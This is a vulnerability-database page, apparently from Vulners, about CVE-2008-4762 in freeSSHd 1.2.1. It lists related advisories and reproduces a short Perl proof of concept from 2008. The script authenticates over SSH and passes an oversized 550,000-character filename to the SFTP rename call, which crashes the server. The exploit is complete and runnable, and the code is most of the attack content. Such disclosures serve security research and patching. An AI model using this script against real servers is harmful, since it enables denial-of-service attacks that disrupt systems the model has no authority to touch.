freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC)
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2008-4762 | 22 Oct 200800:00 | – | circl | |
| CVE-2008-4762 | 28 Oct 200800:00 | – | cve | |
| CVE-2008-4762 | 28 Oct 200800:00 | – | cvelist | |
| freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC) | 22 Oct 200800:00 | – | exploitdb | |
| CVE-2008-4762 | 28 Oct 200802:00 | – | nvd | |
| freeSSHd SFTP 'rename' and 'realpath' < 1.2.6 Remote DoS Vulnerability | 31 Oct 200800:00 | – | openvas | |
| freeSSHd SFTP 'rename' and 'realpath' Remote DoS Vulnerability | 31 Oct 200800:00 | – | openvas | |
| Stack overflow | 28 Oct 200802:00 | – | prion |
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned.
use Net::SSH2;
$host = "192.168.0.187";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 550000;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->rename($dos, "test");
$ssh2->disconnect();
exit;
# milw0rm.com [2008-10-22]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jun 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29
EPSS0.14497